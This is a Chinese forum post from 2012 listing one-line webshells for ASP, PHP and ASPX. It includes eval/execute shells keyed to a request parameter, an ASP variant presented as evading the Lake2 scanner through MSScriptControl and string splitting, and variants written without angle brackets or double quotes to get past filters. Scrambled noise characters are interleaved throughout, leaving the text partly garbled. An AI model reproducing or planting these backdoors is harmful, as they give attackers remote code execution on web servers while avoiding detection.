asp一句话 <%execute(request("1"))%>
1 n8 A/ M0 x& u% ?4 k* h6 v
8 z( ?7 F3 P" N6 Qphp一句话 <?php eval($_POST[1]);?>
5 H1 ^# M Y3 a% i1 g G U6 R( K2 |9 R, G9 d- s* Z4 C
aspx一句话
4 o- _* f- y- ?4 ]& t6 \+ X
; f* Q3 ?+ k( D( E( g. g2 |<script language="C#" runat="server">: L/ O$ O4 I; M1 Z, G( o
8 ?, q4 c8 k6 s- L0 o
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");) i, S6 d+ B3 O* |+ g# l
v* I# A S& |* V</script>
# @. X2 _) R" o' p6 `' }; |5 |
5 G0 u8 n! K6 R: L* p可以躲过雷客图的一句话。6 j0 X) r4 w# K. B) R
8 W7 a5 {/ b# C# z) o! Z
<%1 T( T2 |9 g6 k+ j4 _
+ P) x( }& c* |5 V set ms = server.CreateObject("MSScriptControl.ScriptControl.1")" T+ Z- h( j4 p3 n- j5 Q8 u
; b# z4 @! c4 ~9 R9 y: `4 u. F
ms.Language="VBScript"' _; @$ C7 S C2 }/ v* T0 W
) y" \" X5 z$ O( b7 V# d4 ?# x. B
ms.AddObject "Response", Response5 G" M8 W8 {& s8 K4 ^
; a8 ?( u! j/ g5 k ms.AddObject "request", request6 }7 z/ C6 A0 g" J1 w
: r$ h4 [ I: K1 Y" B2 t ms.ExecuteStatement("ev"&"al(request(""1""))")
" r+ j5 |' E& T4 d/ V0 x4 [2 i' e3 H5 j; l9 F! {; A0 b
%>
8 X& F. G8 v3 j/ f1 }4 z
% `: h: N' v k$ b1 @ 不用'<,>'的asp一句话
4 g3 I" }2 [5 F2 E9 u0 S" N* {3 z' W* q# e* W9 N- d4 K
<script language=VBScript runat=server>execute request("1")</script>
0 Y8 [ `# g' Q% N1 l" D3 F# _5 n, q; `! `% q- T3 d
不用双引号的一句话。
' C! |* p9 \5 o. K! E8 N9 F& o
/ Y4 G8 ?! p( o4 `7 d8 O <%eval request(chr(35))%>
/ w5 y( V' Z8 ^& ?+ Z |
发表于 2012-9-23 14:36:09
收藏
支持
反对